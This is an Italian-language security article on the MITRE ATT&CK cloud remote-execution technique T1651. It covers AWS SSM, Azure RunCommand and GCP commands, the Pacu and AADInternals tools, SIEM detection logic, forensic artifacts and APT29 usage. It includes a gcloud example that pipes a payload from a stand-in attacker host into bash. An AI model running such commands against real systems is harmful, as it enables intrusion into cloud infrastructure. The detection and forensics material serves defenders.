Comandi Cloud per Esecuzione Remota: Cloud Administration Command (T1651)

Per testare la resilienza dell'infrastruttura cloud contro questa tecnica, è fondamentale padroneggiare i comandi nativi delle principali piattaforme. In AWS, il servizio Systems Manager permette l'esecuzione remota attraverso il comando aws ssm send-command.

aws ssm send-command --instance-ids "i-1234567890abcdef0" --document-name "AWS-RunShellScript" --parameters 'commands=["whoami","id","ps aux"]'

Il tool Pacu automatizza molte di queste operazioni per AWS, fornendo moduli specifici per l'exploitation di EC2 attraverso SSM. L'installazione è semplice con pip install pacu, seguita dall'importazione delle credenziali AWS compromesse.

In ambiente Azure, la funzionalità RunCommand offre capacità analoghe. Il comando PowerShell per eseguire script remoti sfrutta il cmdlet Invoke-AzVMRunCommand:

Invoke-AzVMRunCommand -ResourceGroupName "TestRG" -Name "TestVM" -CommandId "RunPowerShellScript" -ScriptPath "C:\exploit.ps1"

AADInternals rappresenta un toolkit potente per l'abuso di Azure. Dopo l'installazione con Install-Module AADInternals, è possibile sfruttare l'agent delle VM per esecuzione remota attraverso funzioni dedicate che interagiscono con l'infrastruttura Azure AD.

Per Google Cloud Platform, il servizio OS Config gestisce l'esecuzione remota. Il comando gcloud permette di inviare script alle istanze:

gcloud compute ssh instance-1 --command="curl http://attacker.com/payload.sh | bash"

La catena d'attacco tipica prevede prima la compromissione di credenziali amministrative cloud, seguita dall'enumerazione delle VM disponibili e infine l'esecuzione di payload attraverso i servizi di gestione. È cruciale testare anche scenari di privilege escalation dove account con permessi limitati vengono elevati sfruttando misconfigurazioni delle policy IAM.

La detection efficace richiede correlazione tra eventi del control plane cloud e attività host-level. In AWS, CloudTrail registra tutte le chiamate API verso Systems Manager, permettendo di identificare pattern anomali come esecuzioni da utenti non previsti o fuori dalle finestre di manutenzione.

Una regola SIEM efficace dovrebbe monitorare eventi come SendCommand in CloudTrail, correlando con l'effettiva esecuzione sui sistemi target entro 5 minuti. L'alert dovrebbe triggerare quando:

event.action = "ssm:SendCommand" AND 
source.ip NOT IN allowed_admin_ranges AND
time NOT BETWEEN maintenance_window

Per Azure, i log di Activity e VMGuest forniscono visibilità complementare. È fondamentale distinguere tra account di servizio legittimi e utenti non amministrativi che invocano RunCommand. La creazione di una whitelist di script approvati riduce drasticamente i falsi positivi.

L'implementazione di baseline comportamentali risulta critica. Monitorare deviazioni come l'esecuzione di comandi PowerShell encoded o download di tool esterni permette di identificare attività malevole anche quando mascherate da operazioni legittime.

La gestione dei falsi positivi richiede un approccio strutturato. Documentare tutti gli script di automazione legittimi, mappare gli account di servizio autorizzati e definire chiaramente le finestre temporali per attività amministrative pianificate. Questo context awareness permette di affinare progressivamente le regole di detection.

L'analisi forense di questa tecnica richiede la correlazione di artefatti multipli distribuiti tra cloud provider e sistemi guest. In AWS, CloudTrail mantiene un audit trail completo delle chiamate API SSM, inclusi parametri dei comandi e timestamp precisi.

Sui sistemi Windows target, l'Event ID 4688 registra la creazione di nuovi processi, permettendo di collegare l'esecuzione remota con l'attività locale. La chiave è identificare processi figli di amazon-ssm-agent.exe o waagent.exe che eseguono comandi sospetti.

Per sistemi Linux, i log di /var/log/amazon/ssm/amazon-ssm-agent.log contengono dettagli sull'esecuzione dei comandi ricevuti. La correlazione temporale con i log di sistema in /var/log/secure o /var/log/auth.log permette di ricostruire l'intera sequenza di azioni.

APT29 ha dimostrato l'uso sofisticato di questa tecnica combinando Azure Run Command con la funzionalità Admin-on-Behalf-of (AOBO). L'analisi dei loro attacchi rivela pattern ricorrenti come l'esecuzione di script PowerShell per discovery seguito da tool di persistenza.

La timeline reconstruction dovrebbe mappare: momento della compromissione dell'account cloud, prima esecuzione remota per reconnaissance, deployment di tool aggiuntivi, movimento laterale verso altre VM, e eventuale esfiltrazione dati. Ogni fase lascia tracce specifiche che vanno preservate e correlate per una comprensione completa dell'incidente.

APT29 rappresenta l'attore principale documentato nell'uso operativo di questa tecnica. Il gruppo, noto per la sofisticazione delle campagne, ha evoluto le proprie capacità cloud-native integrando Azure Run Command nelle catene d'attacco post-compromissione.

L'analisi delle loro operazioni rivela una preferenza per ambienti Azure, sfruttando sia RunCommand che AOBO per mantenere persistenza e muoversi lateralmente. Questo pattern suggerisce una profonda conoscenza dell'ecosistema Microsoft e accesso a risorse significative per sviluppare tool customizzati.

Il overlap di tool tra diversi attori è ancora limitato data la relativa novità della tecnica. Tuttavia, la disponibilità pubblica di AADInternals e Pacu sta democratizzando l'accesso a queste capacità, suggerendo una probabile adozione più ampia nel prossimo futuro.

I trend geografici mostrano una concentrazione di attività in regioni con alta adozione cloud, particolarmente Nord America ed Europa Occidentale. Gli attori state-sponsored sembrano prioritizzare target governativi e grandi enterprise con significativa presenza cloud.

La previsione delle evoluzioni include l'espansione verso piattaforme cloud emergenti, lo sviluppo di tool più sofisticati per bypassare detection, e l'integrazione con tecniche di living-off-the-cloud per minimizzare l'impronta forense. Il monitoraggio di repository pubblici e forum underground per nuovi tool cloud-focused risulta essenziale per anticipare queste evoluzioni.

Framework MITRE ATT&CK T1651. Documentazione ufficiale AWS Systems Manager, Azure RunCommand, GCP OS Config. Report pubblici su campagne APT29 targeting infrastrutture cloud. Repository GitHub AADInternals e Pacu per riferimenti tecnici di exploitation.